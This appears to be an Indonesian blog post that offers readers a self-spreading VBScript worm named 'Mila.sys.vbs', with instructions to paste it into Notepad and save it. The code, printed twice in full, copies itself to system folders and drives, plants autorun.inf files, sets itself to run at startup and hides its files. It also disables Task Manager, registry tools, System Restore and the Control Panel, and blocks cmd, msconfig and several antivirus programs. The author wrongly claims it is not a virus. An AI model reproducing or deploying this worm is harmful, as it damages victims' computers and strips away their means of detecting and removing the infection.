halo teman2 , gw nemu terobosan baru nih, tapi hati2 aja dalam penggunaanya. Jangan di coba di komputer sendiri ya , tar rusak gw g tanggung jawab :)
Ini sebenarnya bukan virus, tetapi sebuah data yg bs merusak seluruh document yg ada di komputer kalian. Check it Out deh...
1. Buka Notepad
2. isi kan kode ini
on error resume next
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(“WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\ActiveDesktop\NoChangingWallpa per”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Wi ndows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer
\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net/”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
f check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(“WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\ActiveDesktop\NoChangingWallpa per”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Wi ndows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer
\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net/”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
f check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs
0 komentar:
Posting Komentar